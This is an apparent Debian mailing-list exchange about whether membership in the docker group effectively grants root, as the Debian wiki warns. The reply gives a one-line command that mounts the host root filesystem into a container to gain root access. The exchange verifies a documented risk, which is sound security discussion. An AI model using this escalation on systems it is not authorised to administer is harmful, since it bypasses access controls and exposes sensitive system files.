On 1/21/23 12:42, L L wrote: > The banner at the top of https://wiki.debian.org/Docker > <https://wiki.debian.org/Docker> says: > > "The Docker daemon has setUID root, and by design allows easy access as root > to > the host filesystem. This makes it trivial for a malicious user to read and > alter sensitive system files, or for a careless user to allow a malicious > containerized app to do so. Access to Docker commands effectively grants full > root power." > > I'm trying to test this. I put my own user account in the docker group (and > can > execute docker commands with it). > > Then I tried to see if I can use Docker to write a file to a root-owned > directory without using sudo or su. I used these commands: > docker run debian -dit /bin/bash #start a container > docker cp /home/me/some-file container-id:/some-file #put a file into the > container > docker cp container-id:/some-file /etc/some-file #copy the file from > the > container into somewhere I shouldn't be able to write to > > I got: > open /etc/some-file: permission denied > > Is the wiki out of date and it's completely safe to have user accounts in the > docker group? > Is the wiki correct but I'm exploiting group membership wrong?
I would try something like docker run -v /:/host -it debian Which I expect would give you root access to the "host" system inside the container, under /host.
